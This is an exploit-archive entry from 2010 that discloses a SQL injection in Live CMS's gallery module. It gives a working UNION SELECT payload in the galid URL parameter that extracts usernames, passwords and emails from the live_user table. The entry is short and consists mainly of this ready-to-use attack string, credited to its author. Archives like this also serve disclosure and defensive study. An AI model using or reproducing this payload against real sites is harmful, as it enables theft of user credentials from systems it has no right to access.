Live CMS SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Live CMS SQL Injection Vulnerability
# Published : 2010-06-17
# Author : ahwak2000
# Previous Title : Planet 1.1 - [CSRF] Add Admin Account
# Next Title : Havij Persistent XSS (<=v1.10)

/*
[-] Live CMS SQL Injection Vulnerability [-]
---Date : 2010-06-17
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://live-space.ru
---Demo : http://demo.live-space.ru/index.php

[-] Vulnerability [-]

http://site.com/path//index.php?area=1&p=gallery&action=showimages&galid=[SQL INj]

[-] eXploit [-]

http://server/path/index.php?area=1&p=gallery&action=showimages&galid=1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),uname,pass,email) from live_user--


[-] Greetz to [-]

To All Friends in V4-team Forums And pc.pirate

*/